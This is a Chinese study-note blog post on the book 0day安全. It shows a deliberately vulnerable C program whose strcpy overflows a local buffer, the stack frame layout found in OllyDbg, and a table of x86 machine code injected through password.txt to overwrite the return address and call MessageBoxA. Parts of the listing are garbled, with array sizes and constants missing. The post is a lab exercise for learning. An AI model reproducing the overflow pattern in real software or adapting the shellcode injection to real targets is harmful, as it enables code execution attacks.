OD: Exploit Me - Inject Instruction
修改之前的代码:
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<windows.h> #define PASSWORD "" int verify_password(char *password)
{
int authenticated=0x03050709;
char buffer[]; // add local buf to be overflowed
authenticated=strcmp(password,PASSWORD);
strcpy(buffer, password); // overflow here
return authenticated;
} int main()
{
int valid_flag=;
char password[];
LoadLibrary("user32.dll"); // for messagebox
if(!freopen("password.txt","r",stdin))
//FILE *fp;
//if(!(fp=fopen("password.txt","rw+")))
{
printf("file open error!\n");
exit();
}
scanf("%s",password);
//fscanf(fp,"%s",password);
printf("password input: %s\n",password);
valid_flag=verify_password(password);
if(valid_flag){
printf("Incorrect password!\n\n");
}
else
{
printf("Congratulation! You have passed the verification!\n\n");
}
//fclose(fp);
return ;
}
注意三处改变:
1. 头文件加入 windows.h
2. 第 11 行 verify_password() 的局部变量 buffer 长度增加为 44,便于填充代码
3. 第 21 行,为填充的代码使用 MessageBox() 作准备。
另外,函数返回地址、MessageBox() 的入口地址要随环境变化重新确定,这些地址可能依赖 OS 的补丁。
UltraEdit 编辑 password.txt,输入 11 组 dcba,由前面的笔记可知,authenticated 会被 overwrite 为 0,可以通过 verify_password() 验证。
OD 调试得出 verify_password() 的栈帧结构为:
| …… |
| buffer[0..3] - 起始于 0x0012FABC |
| buffer[4..7] |
| …… |
| …… |
| buffer[40..43] |
| int authenticated |
| 前栈帧 EBP - 0x0012FAEC : 0x0012FF48 |
| Ret Addr - 0x0012FAF0 : 0x00401248 |
| …… |
Windows 系统中的 User32.dll 中有 MessageBoxA 函数,接下来通过将二进制代码作为 password 输入并溢出覆盖 RetAddr 后调用 MessageBox() 演示代码注入。
实际上,Windows 在执行 MessageBox 时会根据参数类型选择 A 类函数(ASCII) 或 W 类函数(Unicode) 进一步调用 MessageBoxA() 或者 MessageBoxW() 。这些知识可参阅 MFC & Windows API。
调用 MessageBox() 需要先做三件事:
1. 加载 User32.dll,这个在主函数中(开篇代码第 21 行)完成了。
2. 获取 MessageBox() 的入口地址。
3. 将 MessageBox() 的参数入栈。
关于 MessageBox() 的入口地址,原书介绍的方法是利用 Visual C++ 的工具 Dependency Walker。我下载了 Dependency Walker 2.2 并加载了一个带 UI 的程序,找到 User32.dll 地装载基址是 0x77D10000,MessageBoxA() 的偏移是 0x0005EA11,算出来 MessageBoxA() 的入口地址是:
0x77D10000 + 0x0005EA11 = 0x77D6EA11
但调试后发现这个计算出的入口不对,最后是通过在程序中调用 MessageBoxA() 并调试,才发现 MessageBoxA() 的入口应该是 0x7768EA11,偏差 0x6E0000,不知道为什么,这个问题留着以后完成。

这个,作为参数插入的机器码如下所示:
| 机器码 | 汇编码 | 备注 |
| 33 DB | XOR EBX EBX | 压入 "failwest" 的结尾截断符 NULL,与"PUSH 0"等效,但能防止 0 被 strcpy 截断。 |
| 53 | PUSH EBX | |
| 68 77 65 73 74 | PUSH 74736577 | 压入"failwest" 字符串 |
| 68 66 61 69 6C | PUSH 6C696166 | |
| 8B C4 | MOV EAX,ESP | 将字符串指针放入 EAX |
| 53 | PUSH EBX |
MessageBoxA() 的四个参数从右向左依次入栈,参数为 (0,failwest,failwest,0) 消息框为默认风格,标题和内容都是 failwest |
| 50 | PUSH EAX | |
| 50 | PUSH EAX | |
| 53 | PUSH EBX | |
| B8 0E 02 D1 77 | MOV EAX,0x77D1020E | 调用 MessageBoxA() |
| FF D0 | CALL EAX |

注意,上图中多出的 0x90 对应的机器码是 nop(空指令)。
这样,运行后 buffer 会被机器码覆盖,原栈帧 EBP 会被 0x90909090 覆盖,而返回地址会被 buffer 的首地址 0x0012FABC 覆盖。
函数 verify_password() 返回后,EIP 会指向 buffer[],导致 MessageBoxA() 被执行,代码注入完成。
这一节存在的问题是:
1. 如前文描述 MessageBoxA() 的入口地址计算出错,还不知道原因。
2. 注入的 MessageBoxA() 执行后程序会崩溃,因为注入的代码没有安全退出,栈帧和寄存器状态被破坏。
2014年4月7日19:00:55
OD: Exploit Me - Inject Instruction的更多相关文章
- OD: Exploit Me - Overwrite Return Address
修改邻接变量的方法对代码环境限制比较多,更通用.更强大的方法是修改 EBP.返回地址等状态值. 为了方便调试,修改之前的代码如下: #include<stdio.h> #include&l ...
- OD: Exploit Me - Overwrite Nearby Varible
实验代码: #include<stdio.h> #include<string.h> #define PASSWORD "1234567" int veri ...
- 在angular中利用分页插件进行分页
必需:angular分页js和css 当然还有angular.js 还需要bootstrap的css angular.min.js (下面我直接把插件粘贴上去了,以免有的同学还要去找.是不是很贴 ...
- OD: Kernel Exploit - 2 Programming
本节接前方,对 exploitme.sys 进行利用. exploitme.sys 存在任意地址写任意内容的内核漏洞,现在采用执行 Ring0 Shellcode 的方式进行利用. 获取 HalDis ...
- OD: Kernel Exploit - 1
第 22 章,内核漏洞利用技术 首先编写具有漏洞的驱动 exploitme.sys,再展开内核漏洞利用思路和方法: /***************************************** ...
- OD: Heap Exploit : DWORD Shooting & Opcode Injecting
堆块分配时的任意地址写入攻击原理 堆管理系统的三类操作:分配.释放.合并,归根到底都是对堆块链表的修改.如果能伪造链表结点的指针,那么在链表装卸的过程中就有可能获得读写内存的机会.堆溢出利用的精髓就是 ...
- OD: Shellcode / Exploit & DLL Trampolining
看到第五章了. 标题中 Dll Tramplining(跳板)名字是从如下地址找到的,写的很好: http://en.wikipedia.org/wiki/Buffer_overflow#The_ju ...
- RCE via XStream object deserialization && SECURITY-247 / CVE-2016-0792 XML reconstruction Object Code Inject
catalogue . Java xStream . DynamicProxyConverter . java.beans.EventHandler . RCE via XStream object ...
- gdb windbg and od use
gdb aslr -- 显示/设置 gdb 的 ASLR asmsearch -- Search for ASM instructions in memory asmsearch "int ...
随机推荐
- C#结课报告
Revision History Date Issue Description Author 18/May/2015 v1.0 Initial creation 邓彪翼 模拟图书馆的查询系统 1.ob ...
- 学习OpenSeadragon之二 (界面缩放与平移规则设置)
OpenSeadragon入门了解请看第一篇:http://www.cnblogs.com/yingjiehit/p/4362377.html OpenSeadragon给我们提供了很多的可选界面元素 ...
- Android 用ListView实现GridView分列显示
我想实现百度影音首页的这种效果: 在网上用ScrollView+GridView可以实现,但是touch scrollview的时候会莫名刷新gridview,这样用户体验很不好,而且感觉百度不是这样 ...
- 输入框 input只能输入正数和小数点
输入框 input只能输入正数和小数点 限制文本框只能输入正数,负数,小数 onkeyup="value=value.replace(/[^\-?\d.]/g,'')" 限制文本 ...
- discuz 万能SQL查询调用语句写法
首先在最底层source\class\table写入底层安全调用文件例如:table_common_friendlink.php 代码: <?php /** * [Discuz!] (C)200 ...
- Razor视图引擎
在MVC3.0版本的时候,微软终于引入了第二种模板引擎:Razor.在这之前,我们一直在使用WebForm时代沿留下来的ASPX引擎或者第三方的NVelocity模板引擎. (1)Razor文件类型: ...
- HTML5最佳实践
首先先给大家推荐个不错的 前端 网站:http://www.tystudio.net HTML5正迅速称为web前端开发技术标准,作为一名前段开发人员,了解并正确的使用HTML5制作网站变得越来越重要 ...
- NET Core驱动已出,支持EF Core
NET Core驱动已出,支持EF Core 千呼万唤始出来MySQL官方.NET Core驱动已出,支持EF Core. 昨天MySQL官方已经发布了.NET Core 驱动,目前还是预览版,不过功 ...
- Java 多线程之龟兔赛跑(文件夹——读取文件——时间)
版权声明:本文为博主原创文章,未经博主允许不得转载. 描述: 乌龟和兔子(各自是一个Java线程)在我们的电脑上赛跑,我们为它们指定一个跑道(本地文件系统上的一个目录,该目录包含子目录).跑的规则是读 ...
- Linq中join & group join & left join 的用法
Linq中join & group join & left join 的用法 2013-01-30 11:12 12154人阅读 评论(0) 收藏 举报 分类: C#(14) 文章 ...